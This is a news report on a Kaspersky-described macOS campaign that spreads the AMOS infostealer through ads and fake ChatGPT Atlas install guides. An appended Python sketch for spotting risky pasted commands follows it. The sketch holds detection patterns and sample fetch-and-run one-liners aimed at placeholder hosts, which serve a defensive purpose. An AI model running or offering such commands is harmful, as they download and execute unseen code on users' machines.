Kaspersky has uncovered a new macOS malware campaign that uses paid Google search ads and ChatGPT’s chat-sharing feature to spread the AMOS (Atomic macOS Stealer) infostealer. The operation targets Mac users searching for tools such as “chatgpt atlas”, directing them to a page that appears to offer installation instructions for an application named ChatGPT Atlas for macOS. The page is hosted on chatgpt.com and is presented as a legitimate installation guide, although it is actually a shared ChatGPT conversation manipulated to display only a set of step-by-step instructions designed to trick users into executing malicious code.
According to Kaspersky’s threat research team, the attackers rely on social engineering rather than exploiting system vulnerabilities. The guide asks users to copy a single command, paste it into Terminal, and grant all requested permissions. The command fetches and runs a script from an external domain, atlas-extension.com, which then initiates the rest of the infection chain.
Password harvesting and malware installation process
Kaspersky’s analysis shows that the downloaded script repeatedly prompts users for their system password. It checks whether the supplied password is correct by attempting to run system commands. Once the password is validated, the script downloads the AMOS infostealer and uses the acquired credentials to install and launch it.
This pattern is part of a broader tactic known as the ClickFix technique, where users are persuaded to run commands manually, allowing attackers to avoid traditional security barriers. Once active, AMOS collects a wide range of data that can be monetised or used in later attacks. This includes passwords, cookies, and browser information, along with data from cryptocurrency wallets such as Electrum, Coinomi, and Exodus. It also targets applications including Telegram Desktop and OpenVPN Connect.
The malware goes on to search for TXT, PDF, and DOCX files in common user directories such as Desktop, Documents, and Downloads. It also seeks data stored by the built-in Notes app. All collected information is exfiltrated to attacker-controlled servers.
Persistent access and wider trend of AI-themed threats
Alongside AMOS, the script installs a persistent backdoor configured to launch automatically when the system restarts. The backdoor provides remote access to the compromised device and duplicates much of AMOS’s data-gathering behaviour, extending the attacker’s control and visibility beyond the initial breach.
Kaspersky notes that this campaign reflects a wider rise in infostealer activity in 2025. Threat actors have increasingly leveraged AI-related themes and tools to lend credibility to their scams. Recent tactics have included fake AI browser extensions and counterfeit clients for popular AI models. The Atlas-themed operation continues this trend by misusing the chat-sharing feature of a legitimate AI platform to create convincing malicious pages.
Vladimir Gursky, Malware Analyst at Kaspersky, said the success of this campaign stems from how familiar elements are used to lower users’ guard. “What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” he said. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
The company advises users to be cautious of any unsolicited guides that instruct them to run Terminal or PowerShell commands, particularly if they involve copying a single script from a web page or chat. Users should also close suspicious pages, seek expert advice when uncertain, and consider using AI or security tools to analyse unfamiliar commands before execution. Kaspersky further recommends installing reputable security software on all devices, including macOS and Linux systems, to block infostealers and related threats.
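As an added illustration of the advice to analyse unfamiliar commands before running them (this is not Kaspersky's tooling, and the article does not reproduce the actual command), the Python sketch below flags pasted one-liners that fetch remote content and hand it straight to an interpreter. The rule set, function name and sample commands are assumptions constructed for this example; only the domain atlas-extension.com comes from the report.

```python
import re
from urllib.parse import urlparse

# The only indicator taken from the article; every other name is an assumption.
REPORTED_DOMAINS = {"atlas-extension.com"}

# Interpreters a pasted one-liner might hand downloaded text to (assumed list).
INTERP = r"(?:\S*/)?(?:bash|zsh|sh|dash|osascript|python3?|perl|ruby)\b"
RULES = {
    "download piped into an interpreter":
        r"(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?" + INTERP,
    "interpreter runs output of a download":
        INTERP + r"\s+(?:-\w+\s+)*[\"']?(?:\$\(|`)\s*(?:curl|wget)\b",
    "base64-decoded text piped into an interpreter":
        r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?" + INTERP,
}
URL_RE = re.compile(r"https?://[^\s\"'`)]+")


def triage(command: str) -> dict:
    """Return the fetch-and-execute findings and contacted hosts for one command."""
    findings = [name for name, pat in RULES.items() if re.search(pat, command)]
    hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(command)} - {None})
    reported = [h for h in hosts
                if any(h == d or h.endswith("." + d) for d in REPORTED_DOMAINS)]
    if reported:
        findings.append("contacts a domain named in the report")
    return {"block": bool(findings), "findings": findings, "hosts": hosts}


# Constructed samples using placeholder hosts; none is taken from the campaign.
SAMPLES = [
    '/bin/bash -c "$(curl -fsSL https://dl.example.invalid/install.sh)"',
    "curl -s https://cdn.example.invalid/setup.sh | sudo bash",
    "echo Y29uc3RydWN0ZWQ= | base64 -D | zsh",
    "curl -fsSL https://example.invalid/tool.tgz -o tool.tgz",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample), "<-", sample)
```

A match means the command would execute content the user never saw, which is the behaviour the guide in this campaign relied on; an empty result is not proof that a command is safe.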



